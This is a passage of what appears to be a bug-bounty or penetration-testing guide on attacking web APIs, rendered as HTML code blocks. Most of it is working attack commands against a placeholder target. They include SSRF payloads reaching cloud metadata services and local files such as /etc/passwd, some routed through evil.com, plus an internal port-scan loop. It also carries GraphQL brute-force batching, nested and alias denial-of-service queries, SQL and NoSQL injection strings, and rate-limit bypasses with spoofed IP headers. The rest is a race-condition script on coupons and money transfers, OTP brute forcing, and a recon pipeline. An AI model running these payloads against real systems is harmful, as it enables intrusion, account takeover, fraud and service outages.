class="s2">"https://api.target.com/v1/import?url=http://metadata.google.internal/"</span> <span class="c"># GCP</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/import?url=http://metadata.google.internal/computeMetadata/v1/project/project-id"</span> <span class="c"># GCP</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/import?url=http://100.100.100.200/latest/meta-data/"</span> <span class="c"># Alibaba</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/import?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01"</span> <span class="c"># Azure</span> <span class="c"># SSRF via redirect</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/avatar?url=http://redirect.com/to=http://169.254.169.254/"</span> <span class="c"># SSRF via DNS rebinding</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/avatar?url=http://1e100.net/"</span> <span class="c"># Google — may bypass allowlists</span> <span class="c"># SSRF via protocol smuggling</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/avatar?url=http://127.0.0.1:8080@evil.com/"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/avatar?url=http://evil.com#@127.0.0.1:8080/"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/avatar?url=http://evil.com</span><span class="se">\@</span><span class="s2">127.0.0.1:8080/"</span> <span class="c"># SSRF — port scan internal network</span> <span class="k">for </span>port <span class="k">in </span>80 443 3000 5000 6379 8000 8080 8443 9000 9200 27017 5432 3306 22 21 25 110 143 389 636 1433 1521 1830 4444 5000 5555 5601 5672 5984 6379 6443 7077 8000 8443 8983 9090 9200 9300 9999 11211 15672 27017<span class="p">;</span> <span class="k">do </span><span class="nv">status</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="nt">-o</span> /dev/null <span class="nt">-w</span> <span class="s2">"%{http_code}"</span> <span class="nt">--connect-timeout</span> 3 <span class="se">\</span> <span class="s2">"https://api.target.com/v1/proxy?url=http://127.0.0.1:</span><span class="nv">$port</span><span class="s2">/"</span><span class="si">)</span> <span class="nb">echo</span> <span class="s2">"Port </span><span class="nv">$port</span><span class="s2">: </span><span class="nv">$status</span><span class="s2">"</span> <span class="k">done</span> <span class="c"># SSRF — file read via file:// protocol</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/avatar?url=file:///etc/passwd"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/avatar?url=file:///proc/1/environ"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/avatar?url=file:///proc/net/fib_trie"</span> <span class="c"># SSRF — internal service discovery</span> <span class="k">for </span>service <span class="k">in </span>internal-admin.target.internal admin.target.internal db.target.internal redis.target.internal jenkins.target.internal gitlab.target.internal<span class="p">;</span> <span class="k">do </span>curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/proxy?url=http://</span><span class="nv">$service</span><span class="s2">:8080/"</span> <span class="k">done</span> </code></pre> </div> <h2> Phase 5: GraphQL-Specific Attacks </h2> <h3> 5.1 Introspection &amp; Schema Extraction </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># InQL scanner</span> inql <span class="nt">-t</span> https://api.target.com/graphql <span class="nt">-d</span> <span class="c"># Clairvoyance — introspection even when blocked</span> clairvoyance https://api.target.com/graphql <span class="nt">-o</span> schema.json <span class="c"># GraphQL map</span> python3 graphqlmap.py <span class="nt">-u</span> https://api.target.com/graphql <span class="c"># Manual introspection when standard query is blocked</span> <span class="c"># Try sending introspection with different content types</span> curl <span class="nt">-s</span> https://api.target.com/graphql <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/graphql"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{ __schema { types { name kind fields { name } } } }'</span> <span class="c"># Try introspection via GET request</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/graphql?query={__schema{types{name}}}"</span> <span class="c"># Try with different Accept headers</span> curl <span class="nt">-s</span> https://api.target.com/graphql <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Accept: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"query": "query{__schema{types{name}}}"}'</span> </code></pre> </div> <h3> 5.2 Batching &amp; Rate Limit Bypass </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Batch login bruteforce — single request, many passwords</span> curl <span class="nt">-s</span> https://api.target.com/graphql <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'[ {"query": "mutation { login(username: \"admin\", password: \"password1\") { token } }"}, {"query": "mutation { login(username: \"admin\", password: \"password2\") { token } }"}, {"query": "mutation { login(username: \"admin\", password: \"password3\") { token } }"}, {"query": "mutation { login(username: \"admin\", password: \"password4\") { token } }"}, {"query": "mutation { login(username: \"admin\", password: \"password5\") { token } }"}, {"query": "mutation { login(username: \"admin\", password: \"password6\") { token } }"}, {"query": "mutation { login(username: \"admin\", password: \"password7\") { token } }"}, {"query": "mutation { login(username: \"admin\", password: \"password8\") { token } }"}, {"query": "mutation { login(username: \"admin\", password: \"password9\") { token } }"}, {"query": "mutation { login(username: \"admin\", password: \"password10\") { token } }"} ]'</span> <span class="c"># Generate 100 batch requests</span> python3 <span class="nt">-c</span> <span class="s2">" import json, requests queries = [] for i in range(100): queries.append({'query': f'mutation {{ login(username: </span><span class="se">\"</span><span class="s2">admin</span><span class="se">\"</span><span class="s2">, password: </span><span class="se">\"</span><span class="s2">password{i}</span><span class="se">\"</span><span class="s2">) {{ token }} }}'}) print(json.dumps(queries)) "</span> <span class="o">&gt;</span> batch_queries.json curl <span class="nt">-s</span> https://api.target.com/graphql <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> @batch_queries.json </code></pre> </div> <h3> 5.3 Deep Query &amp; Nested Abuse </h3> <div class="highlight js-code-highlight"> <pre class="highlight graphql"><code><span class="c"># Circular query — cause DoS via deep nesting</span><span class="w"> </span><span class="k">query</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">user</span><span class="p">(</span><span class="n">id</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">posts</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">comments</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">user</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">posts</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">comments</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">user</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">posts</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">comments</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">user</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">posts</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">comments</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">user</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h3> 5.4 Field Duplication &amp; Resource Exhaustion </h3> <div class="highlight js-code-highlight"> <pre class="highlight graphql"><code><span class="c"># Field duplication abuse</span><span class="w"> </span><span class="k">query</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">__typename</span><span class="w"> </span><span class="n">__typename</span><span class="w"> </span><span class="n">__typename</span><span class="w"> </span><span class="n">__typename</span><span class="w"> </span><span class="n">user</span><span class="p">(</span><span class="n">id</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="n">posts</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h3> 5.5 GraphQL Injection </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># SQL injection in GraphQL</span> curl <span class="nt">-X</span> POST https://api.target.com/graphql <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"query": "{ user(id: \"1'</span> OR <span class="s1">'1'</span><span class="o">=</span><span class="s1">'1\") { id email password } }"}'</span> <span class="c"># NoSQL injection in GraphQL</span> curl <span class="nt">-X</span> POST https://api.target.com/graphql <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"query": "{ login(username: \"admin\", password: \"{\\$ne: \\\"\\\"}\") { token } }"}'</span> <span class="c"># GraphQL argument injection</span> curl <span class="nt">-X</span> POST https://api.target.com/graphql <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"query": "query { user(id: 1) { id email } }", "variables": {"id": "1 UNION SELECT 1,2,3"}}'</span> </code></pre> </div> <h3> 5.6 GraphQL DoS — Aliases </h3> <div class="highlight js-code-highlight"> <pre class="highlight graphql"><code><span class="c"># Alias-based resource exhaustion</span><span class="w"> </span><span class="k">query</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">a1</span><span class="p">:</span><span class="w"> </span><span class="n">user</span><span class="p">(</span><span class="n">id</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="n">a2</span><span class="p">:</span><span class="w"> </span><span class="n">user</span><span class="p">(</span><span class="n">id</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="n">a3</span><span class="p">:</span><span class="w"> </span><span class="n">user</span><span class="p">(</span><span class="n">id</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="n">a4</span><span class="p">:</span><span class="w"> </span><span class="n">user</span><span class="p">(</span><span class="n">id</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="n">a5</span><span class="p">:</span><span class="w"> </span><span class="n">user</span><span class="p">(</span><span class="n">id</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="c"># ... up to thousands of aliases</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Phase 6: Rate Limit Testing &amp; Business Logic Abuse </h2> <h3> 6.1 Rate Limit Bypass Techniques </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Technique 1: Header manipulation</span> curl <span class="nt">-s</span> https://api.target.com/v1/forgot-password <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"email":"victim@test.com"}'</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-Forwarded-For: 127.0.0.1"</span> curl <span class="nt">-s</span> https://api.target.com/v1/forgot-password <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"email":"victim@test.com"}'</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-Forwarded-For: 127.0.0.2"</span> <span class="c"># Try all common IP spoofing headers</span> <span class="k">for </span>ip <span class="k">in</span> <span class="s2">"127.0.0.1"</span> <span class="s2">"10.0.0.1"</span> <span class="s2">"192.168.1.1"</span> <span class="s2">"0.0.0.0"</span> <span class="s2">"1.2.3.4"</span><span class="p">;</span> <span class="k">do </span>curl <span class="nt">-s</span> https://api.target.com/v1/forgot-password <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"email":"victim@test.com"}'</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-Forwarded-For: </span><span class="nv">$ip</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-Real-IP: </span><span class="nv">$ip</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-Originating-IP: </span><span class="nv">$ip</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-Remote-IP: </span><span class="nv">$ip</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-Client-IP: </span><span class="nv">$ip</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Forwarded: for=</span><span class="nv">$ip</span><span class="s2">"</span> <span class="k">done</span> <span class="c"># Technique 2: Method alternation</span> <span class="c"># If POST is rate-limited, try PATCH or PUT</span> curl <span class="nt">-X</span> PATCH https://api.target.com/v1/forgot-password <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"email":"victim@test.com"}'</span> curl <span class="nt">-X</span> PUT https://api.target.com/v1/forgot-password <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"email":"victim@test.com"}'</span> <span class="c"># Technique 3: Parameter pollution</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/forgot-password?email=test@test.com&amp;email=admin@admin.com"</span> <span class="c"># Technique 4: Content-Type switching</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/forgot-password <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/x-www-form-urlencoded"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s2">"email=victim@test.com"</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/forgot-password <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: text/plain"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"email":"victim@test.com"}'</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/forgot-password <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/xml"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'&lt;?xml version="1.0"?&gt;&lt;root&gt;&lt;email&gt;victim@test.com&lt;/email&gt;&lt;/root&gt;'</span> <span class="c"># Technique 5: Unicode/encoding bypass</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/forgot-password?email=victim%40test.com"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/forgot-password?email=victim@test.com&amp;email=victim%40test.com"</span> <span class="c"># Technique 6: Case normalization bypass</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/V1/forgot-password"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/Forgot-password"</span> <span class="c"># Technique 7: Add trailing slashes or dots</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/forgot-password/"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/forgot-password.."</span> </code></pre> </div> <h3> 6.2 Business Logic Flaws </h3> <h4> Race Conditions / TOCTOU </h4> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span><span class="sh">"""</span><span class="s"> Race condition testing — concurrent operations </span><span class="sh">"""</span> <span class="kn">import</span> <span class="n">requests</span> <span class="kn">import</span> <span class="n">threading</span> <span class="kn">import</span> <span class="n">time</span> <span class="kn">from</span> <span class="n">concurrent.futures</span> <span class="kn">import</span> <span class="n">ThreadPoolExecutor</span> <span class="n">TOKEN</span> <span class="o">=</span> <span class="sh">"</span><span class="s">YOUR_TOKEN_HERE</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">redeem_coupon</span><span class="p">():</span> <span class="sh">"""</span><span class="s">Test race condition on coupon redemption</span><span class="sh">"""</span> <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sh">"</span><span class="s">https://api.target.com/v1/coupons/redeem</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">code</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">ONETIME50</span><span class="sh">"</span><span class="p">},</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">Authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Bearer </span><span class="si">{</span><span class="n">TOKEN</span><span class="si">}</span><span class="sh">"</span><span class="p">}</span> <span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Status: </span><span class="si">{</span><span class="n">r</span><span class="p">.</span><span class="n">status_code</span><span class="si">}</span><span class="s">, Response: </span><span class="si">{</span><span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="si">:</span><span class="mi">100</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">transfer_money</span><span class="p">():</span> <span class="sh">"""</span><span class="s">Test race condition on money transfer</span><span class="sh">"""</span> <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sh">"</span><span class="s">https://api.target.com/v1/transfer</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">amount</span><span class="sh">"</span><span class="p">:</span> <span class="mi">100</span><span class="p">,</span> <span class="sh">"</span><span class="s">to</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">attacker_account</span><span class="sh">"</span><span class="p">},</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">Authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Bearer </span><span class="si">{</span><span class="n">TOKEN</span><span class="si">}</span><span class="sh">"</span><span class="p">}</span> <span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Status: </span><span class="si">{</span><span class="n">r</span><span class="p">.</span><span class="n">status_code</span><span class="si">}</span><span class="s">, Response: </span><span class="si">{</span><span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="si">:</span><span class="mi">100</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">update_quantity</span><span class="p">():</span> <span class="sh">"""</span><span class="s">Test race condition on product quantity</span><span class="sh">"""</span> <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sh">"</span><span class="s">https://api.target.com/v1/cart/checkout</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">Authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Bearer </span><span class="si">{</span><span class="n">TOKEN</span><span class="si">}</span><span class="sh">"</span><span class="p">}</span> <span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Status: </span><span class="si">{</span><span class="n">r</span><span class="p">.</span><span class="n">status_code</span><span class="si">}</span><span class="s">, Response: </span><span class="si">{</span><span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="si">:</span><span class="mi">100</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Fire 50 simultaneous requests </span><span class="k">with</span> <span class="nc">ThreadPoolExecutor</span><span class="p">(</span><span class="n">max_workers</span><span class="o">=</span><span class="mi">50</span><span class="p">)</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span> <span class="n">futures</span> <span class="o">=</span> <span class="p">[</span><span class="n">executor</span><span class="p">.</span><span class="nf">submit</span><span class="p">(</span><span class="n">redeem_coupon</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">50</span><span class="p">)]</span> <span class="k">for</span> <span class="n">future</span> <span class="ow">in</span> <span class="n">futures</span><span class="p">:</span> <span class="n">future</span><span class="p">.</span><span class="nf">result</span><span class="p">()</span> </code></pre> </div> <h4> Integer Overflow / Underflow </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Negative numbers — quantity manipulation</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/cart/add <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"product_id": 1, "quantity": -100}'</span> <span class="c"># Large numbers causing overflow</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/transfer <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"amount": 99999999999999999999, "to": "attacker"}'</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/transfer <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"amount": -1, "to": "attacker"}'</span> <span class="c"># Float manipulation</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/transfer <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"amount": 0.00000001, "to": "attacker"}'</span> <span class="c"># String concatenation in numeric fields</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/transfer <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"amount": "1000000", "to": "attacker"}'</span> </code></pre> </div> <h4> OTP/Forgot Password Abuse </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Test if OTP is tied to session</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/forgot-password <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"email": "victim@test.com"}'</span> <span class="c"># Try reusing the same OTP</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/reset-password <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"otp": "123456", "email": "victim@test.com", "new_password": "Hacked123!"}'</span> <span class="c"># Try OTP bypass via response manipulation</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/reset-password <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"otp": "*", "email": "victim@test.com", "new_password": "Hacked123!"}'</span> <span class="c"># Try OTP via race condition (guess before rate limit kicks in)</span> parallel <span class="nt">-j</span> 20 curl <span class="nt">-X</span> POST https://api.target.com/v1/reset-password <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'"{\"otp\": \"{1}\", \"email\": \"victim@test.com\", \"new_password\": \"Hacked123!\"}"'</span> ::: <span class="o">{</span>100000..100020<span class="o">}</span> </code></pre> </div> <h2> Phase 7: Automation — Build Your API Recon Pipeline </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c">#!/bin/bash</span> <span class="c"># api-recon-pipeline.sh — full automated API recon</span> <span class="c"># Usage: ./api-recon-pipeline.sh target.com</span> <span class="nv">TARGET</span><span class="o">=</span><span class="nv">$1</span> <span class="nv">OUTDIR</span><span class="o">=</span><span class="s2">"api_recon_</span><span class="nv">$TARGET</span><span class="s2">"</span> <span class="nb">mkdir</span> <span class="nt">-p</span> <span class="nv">$OUTDIR</span>/<span class="o">{</span>urls,subdomains,params,swagger,ffuf<span class="o">}</span> <span class="nb">echo</span> <span class="s2">"[+] Starting API Recon Pipeline for </span><span class="nv">$TARGET</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">"[+] Time: </span><span class="si">$(</span><span class="nb">date</span><span class="si">)</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="c"># === Phase 1: Passive URL Collection ===</span> <span class="nb">echo</span> <span class="s2">"[*] Passive URL collection"</span> gau <span class="nt">--subs</span> <span class="nv">$TARGET</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="o">&gt;</span> <span class="nv">$OUTDIR</span>/urls/gau_urls.txt waybackurls <span class="nv">$TARGET</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="o">&gt;</span> <span class="nv">$OUTDIR</span>/urls/wayback_urls.txt waymore <span class="nt">-i</span> <span class="nv">$TARGET</span> <span class="nt">-mode</span> U <span class="nt">-o</span> U 2&gt;/dev/null | <span class="nb">sort</span> <span class="nt">-u</span> <span class="o">&gt;</span> <span class="nv">$OUTDIR</span>/urls/waymore_urls.txt <span class="c"># Combine all passive URLs</span> <span class="nb">cat</span> <span class="nv">$OUTDIR</span>/urls/<span class="k">*</span>.txt | <span class="nb">sort</span> <span class="nt">-u</span> <span class="o">&gt;</span> <span class="nv">$OUTDIR</span>/urls/all_passive_urls.txt <span class="c"># === Phase 2: Extract API Endpoints ===</span> <span class="nb">echo</span> <span class="s2">"[*] Extracting API endpoints"</span> <span class="nb">cat</span> <span class="nv">$OUTDIR</span>/urls/all_passive_urls.txt | <span class="nb">grep</span> <span class="nt">-iE</span> <span class="se">\</span> <span class="s2">"api|rest|graphql|swagger|v[0-9]|</span><span class="se">\.</span><span class="s2">json|</span><span class="se">\.</span><span class="s2">xml|</span><span class="se">\.</span><span class="s2">yaml|</span><span class="se">\.</span><span class="s2">yml"</span> <span class="se">\</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="o">&gt;</span> <span class="nv">$OUTDIR</span>/urls/api_endpoints.txt <span class="nb">echo</span> <span class="s2">" Found </span><span class="si">$(</span><span class="nb">wc</span> <span class="nt">-l</span> &lt; <span class="nv">$OUTDIR</span>/urls/api_endpoints.txt<span class="si">)</span><span class="s2"> potential API endpoints"</span> <span class="c"># === Phase 3: JavaScript Analysis ===</span> <span class="nb">echo</span> <span class="s2">"[*] Extracting endpoints from JavaScript files"</span> <span class="nb">cat</span> <span class="nv">$OUTDIR</span>/urls/all_passive_urls.txt | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">js$"</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="o">&gt;</span> <span class="nv">$OUTDIR</span>/urls/js_files.txt <span class="k">while </span><span class="nb">read</span> <span class="nt">-r</span> js_url<span class="p">;</span> <span class="k">do </span>curl <span class="nt">-s</span> <span class="nt">--connect-timeout</span> 5 <span class="s2">"</span><span class="nv">$js_url</span><span 